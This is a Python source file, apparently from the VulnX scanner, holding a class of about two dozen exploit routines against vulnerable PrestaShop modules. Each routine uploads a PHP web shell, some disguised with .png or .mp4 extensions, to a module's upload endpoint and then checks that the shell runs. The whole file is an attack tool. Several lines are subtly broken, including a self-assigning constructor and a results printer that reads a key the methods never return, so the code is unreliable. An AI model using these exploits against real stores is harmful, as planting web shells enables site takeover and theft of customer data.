import requests
import re
import os
from common.colors import que,vulnexploit,que,failexploit,run,W

class PSExploits(object):

    def __init__(self, url, headers):
        self.url = self.url
        self.headers = headers
    #columnadvert
    def columnadverts(self):
        endpoint = self.url + "/modules/columnadverts/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/columnadverts/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="columnadverts",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="columnadverts",
                status=False
            )

    #soopabanner
    def soopabanners(self):
        endpoint = self.url + "/modules/soopabanners/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/soopabanners/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="soopabanners",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="soopabanners",
                status=False
            )

    #vtermslideshow
    def vtslide(self):
        endpoint = self.url + "/modules/vtermslideshow/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="vtslide",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="vtslide",
                status=False
            )

    #simpleslideshow
    def simpleslideshow(self):
        endpoint = self.url + "/modules/simpleslideshow/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/simpleslideshow/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="simpleslideshow",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="simpleslideshow",
                status=False
            )

    #productpageadverts
    def productpageadverts(self):
        endpoint = self.url + "/modules/productpageadverts/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/productpageadverts/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="productpageadverts",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="productpageadverts",
                status=False
            )

    #productpageadvertsb
    def productpageadvertsb(self):
        endpoint = self.url + "/modules/homepageadvertise2/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/homepageadvertise2/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="productpageadvertsb",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="productpageadvertsb",
                status=False
            )

    #jro_homepageadvertise
    def jro_homepageadvertise(self):
        endpoint = self.url + "/modules/jro_homepageadvertise/uploadimage.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="jro_homepageadvertise",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="jro_homepageadvertise",
                status=False
            )
    #attributewizardpro
    def attributewizardpro(self):
        endpoint = self.url + "/modules/attributewizardpro/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="attributewizardpro",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="attributewizardpro",
                status=False
            )

    #-------------attributewizardpro
    def oneattributewizardpro(self):
        endpoint = self.url + "/modules/1attributewizardpro/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/1attributewizardpro/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="oneattributewizardpro",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="oneattributewizardpro",
                status=False
            )


    #attributewizardproOLD
    def attributewizardpro_old(self):
        endpoint = self.url + "/modules/attributewizardpro.OLD/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/attributewizardpro.OLD/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="attributewizardpro_old",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="attributewizardpro_old",
                status=False
            )

    #attributewizardproold
    def attributewizardpro_x(self):
        endpoint = self.url + "/modules/attributewizardpro_x/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="attributewizardpro_x",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="attributewizardpro_x",
                status=False
            )

    #advancedslider
    def advancedslider(self):
        endpoint = self.url + "/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php"
        img = open('shell/VulnX.php.png', 'rb')
        name_img= os.path.basename('shell/VulnX.php.png')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="advancedslider",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="advancedslider",
                status=False
            )


    #cartabandonmentpro
    def cartabandonmentpro(self):
        endpoint = self.url + "/modules/cartabandonmentpro/upload.php"
        img = open('shell/VulnX.php.png', 'rb')
        name_img= os.path.basename('shell/VulnX.php.png')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="cartabandonmentpro",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="cartabandonmentpro",
                status=False
            )

    #cartabandonmentpro_old
    def cartabandonmentpro_old(self):
        endpoint = self.url + "/modules/cartabandonmentproOld/upload.php"
        img = open('shell/VulnX.php.png', 'rb')
        name_img= os.path.basename('shell/VulnX.php.png')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/cartabandonmentproOld/uploads/VulnX.php.png?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="cartabandonmentpro_old",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="cartabandonmentpro_old",
                status=False
            )

    #videostab
    def videostab(self):
        endpoint = self.url + "/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload"
        img = open('shell/VulnX.php.mp4', 'rb')
        name_img= os.path.basename('shell/VulnX.php.mp4')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="videostab",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="videostab",
                status=False
            )

    #wg24themeadministration
    def wg24themeadministration(self):
        endpoint = self.url + "/modules//wg24themeadministration/wg24_ajax.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}),
                'type' : 'pattern_upload' }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="wg24themeadministration",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="wg24themeadministration",
                status=False
            )

    #fieldvmegamenu
    def fieldvmegamenu(self):
        endpoint = self.url + "/modules/fieldvmegamenu/ajax/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/fieldvmegamenu/uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="fieldvmegamenu",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="fieldvmegamenu",
                status=False
            )

    #wdoptionpanel
    def wdoptionpanel(self):
        endpoint = self.url + "/modules/wdoptionpanel/wdoptionpanel_ajax.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}),
                'type' : 'pattern_upload' }
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/wdoptionpanel/upload/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="wdoptionpanel",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="wdoptionpanel",
                status=False
            )

    #pk_flexmenu
    def pk_flexmenu(self):
        endpoint = self.url + "/modules/pk_flexmenu/ajax/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/pk_flexmenu/uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="pk_flexmenu",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="pk_flexmenu",
                status=False
            )

    #pk_vertflexmenu
    def pk_vertflexmenu(self):
        endpoint = self.url + "/modules/pk_vertflexmenu/ajax/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/pk_vertflexmenu/uploads/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="pk_vertflexmenu",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="pk_vertflexmenu",
                status=False
            )

    #nvn_export_orders
    def nvn_export_orders(self):
        endpoint = self.url + "/modules/nvn_export_orders/upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/nvn_export_orders/nvn_extra_add.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="nvn_export_orders",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="nvn_export_orders",
                status=False
            )

    #tdpsthemeoptionpanel
    def tdpsthemeoptionpanel(self):
        endpoint = self.url + "/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/modules/tdpsthemeoptionpanel/upload/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="tdpsthemeoptionpanel",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="tdpsthemeoptionpanel",
                status=False
            )

    #masseditproduct
    def masseditproduct(self):
        endpoint = self.url + "/modules/lib/redactor/file_upload.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False)
        dump_data = self.url + "/masseditproduct/uploads/file/VulnX.php?Vuln=X"
        checkShell = requests.get(dump_data,headers=self.headers,verify=False)
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="masseditproduct",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="masseditproduct",
                status=False
            )

    def exploit_state(self,exploit):
        if (exploit['status']):
            print(' {0} {1} {2} {3}'.format(que,exploit['name'],vulnexploit,exploit['dump_data']))
        else:
            print(' {0} {1} {2}'.format(que,exploit['name'],failexploit))

    def psexploits(self):
        self.exploit_state(self.columnadverts())
        self.exploit_state(self.soopabanners())
        self.exploit_state(self.vtslide())
        self.exploit_state(self.simpleslideshow())
        self.exploit_state(self.productpageadverts())
        self.exploit_state(self.productpageadvertsb())
        self.exploit_state(self.jro_homepageadvertise())
        self.exploit_state(self.attributewizardpro())
        self.exploit_state(self.oneattributewizardpro())
        self.exploit_state(self.attributewizardpro_old())
        self.exploit_state(self.attributewizardpro_x())
        self.exploit_state(self.advancedslider())
        self.exploit_state(self.cartabandonmentpro())
        self.exploit_state(self.cartabandonmentpro_old())
        self.exploit_state(self.videostab())
        self.exploit_state(self.wg24themeadministration())
        self.exploit_state(self.fieldvmegamenu())
        self.exploit_state(self.wdoptionpanel())
        self.exploit_state(self.pk_flexmenu())
        self.exploit_state(self.pk_vertflexmenu())
        self.exploit_state(self.nvn_export_orders())
        self.exploit_state(self.tdpsthemeoptionpanel())
        self.exploit_state(self.masseditproduct())